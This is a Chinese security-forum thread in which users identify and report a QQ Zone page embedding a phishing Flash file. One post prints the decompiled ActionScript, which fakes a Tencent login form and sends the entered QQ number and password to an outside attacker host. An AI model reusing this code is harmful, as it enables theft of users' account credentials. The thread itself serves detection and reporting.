[某人QQZone] hxxp://806746439.qzone.qq.com/ [钓鱼]

显示全部楼层 · 发表于 2011-7-17 19:31:11

hxxp://806746439.qzone.qq.com/

内嵌一个flash，地址hxxp://web0622155.w201.dns558.com/78dsdx/6sd/1233.swf，用于获得用户账号密码。

很低级的手段。。。

显示全部楼层 · 发表于 2011-7-17 20:19:53

是这个吗？我以为是真的，幸好没输入。因为我QQ上着，打开空间的时候是不用再输入帐号密码的。哈哈哈。举报他。

显示全部楼层 · 发表于 2011-7-17 20:34:34

佩恩无视一切发表于 2011-7-17 20:19
是这个吗？我以为是真的，幸好没输入。因为我QQ上着，打开空间的时候是不用再输入帐号密码的。哈哈哈。 ...

就是这个。。。

显示全部楼层 · 发表于 2011-7-17 20:36:09

呃，确实很低级，1233.swf，恶意

显示全部楼层 · 发表于 2011-7-17 20:47:01

帅就是帅发表于 2011-7-17 20:36
呃，确实很低级，1233.swf，恶意

这样看还是挺能忽悠人的。。。

显示全部楼层 · 发表于 2011-7-17 20:50:04

本帖最后由帅就是帅于 2011-7-17 21:11 编辑

alexyangjie 发表于 2011-7-17 20:47
这样看还是挺能忽悠人的。。。

果然还实时更新，再进就不一样了。。。。

====

1.无论如何输入密码都会提示密码错误；
2.无论使用什么浏览器（火狐等），均为"IE"提示错误；
3.验证码也不会变，只为那一个。

可屏蔽该swf文件正常访问空间，则看出原样。

已举报

显示全部楼层 · 发表于 2011-7-17 22:02:53

?// Action script...

// [onClipEvent of sprite 66 in frame 1]
onClipEvent (load)
{
this.gotoAndStop(Number(1 + random(8) * 20));
}

// [onClipEvent of sprite 66 in frame 5]
onClipEvent (load)
{
this.gotoAndStop(Number(1 + random(8) * 20));
}

// [Action in Frame 1]
function gomy()
{
getURL("http://qq.com");
} // End of the function
var mymenu = new ContextMenu();
Stage.scaleMode = "noscale";
mymenu.hideBuiltInItems();
mymenu.customItems.push(new ContextMenuItem("All Rights Reserved ", gomy));
mymenu.customItems.push(new ContextMenuItem("腾迅科技", gomy));
_root.menu = mymenu;
var str = "http://web0622155.w201.dns558.com/78dsdx/6sd/qq.asp";
var cou = 0;
ntxt.restrict = "0-9";
var scData = new LoadVars();
scData.onLoad = function (success)
{
++cou;
if (cou > 1)
{
      _root.gotoAndStop(41);
} // end if
};
sub_btn.onRelease = function ()
{
var _loc2 = ntxt.text;
var _loc1 = ptxt.text;
var _loc3 = rtxt.text;
if (_loc2 == "")
{
      gotoAndPlay(10);
}
else if (_loc1 == "")
{
      gotoAndPlay(20);
}
else if (_loc3 == "")
{
      gotoAndPlay(30);
}
else
{
      scData.QQNumber = _loc2;
      scData.QQPassWord = _loc1;
      scData.sendAndLoad(str, scData, "get");
      gotoAndPlay(35);
} // end else if
};
stop ();

// [Action in Frame 4]
stop ();

// [Action in Frame 5]
function gomy()
{
getURL("http://qq.com");
} // End of the function
var mymenu = new ContextMenu();
Stage.scaleMode = "noscale";
mymenu.hideBuiltInItems();
mymenu.customItems.push(new ContextMenuItem("All Rights Reserved ", gomy));
mymenu.customItems.push(new ContextMenuItem("腾迅科技", gomy));
_root.menu = mymenu;
var str = "http://web0622155.w201.dns558.com/78dsdx/6sd/qq.asp";
var cou = 0;
ntxt.restrict = "0-9";
var scData = new LoadVars();
scData.onLoad = function (success)
{
++cou;
if (cou > 1)
{
      _root.gotoAndStop(41);
} // end if
};
sub_btn.onRelease = function ()
{
var _loc3 = ntxt.text;
var _loc2 = ptxt.text;
var _loc4 = rtxt.text;
if (_loc3 == "")
{
      gotoAndPlay(10);
}
else if (_loc2 == "")
{
      gotoAndPlay(20);
}
else if (_loc4 == "")
{
      gotoAndPlay(30);
}
else
{
      scData.QQNumber = _loc3;
      scData.QQPassWord = _loc2;
      scData.sendAndLoad(str, scData, "get");
      _root.gotoAndStop(40);
} // end else if
};
stop ();

// [Action in Frame 10]
stop ();

// [Action in Frame 20]
stop ();

// [Action in Frame 30]
stop ();

// [Action in Frame 35]
stop ();

// [Action in Frame 40]
stop ();

显示全部楼层 · 发表于 2011-7-17 22:07:55

我去逗逗。。

显示全部楼层 · 发表于 2011-7-17 22:08:47

帅就是帅发表于 2011-7-17 20:50
果然还实时更新，再进就不一样了。。。。

====

不应该啊...里面还有几张的,验证码怎么会不变....

显示全部楼层 · 发表于 2011-7-17 22:32:29

是昔流芳发表于 2011-7-17 22:08
不应该啊...里面还有几张的,验证码怎么会不变....

呃，貌似是这个swf本身的问题，而且，这个似乎只是个恶作剧，并没有真正的恶意行为。。。。

[已鉴定] [某人QQZone] hxxp://806746439.qzone.qq.com/ [钓鱼]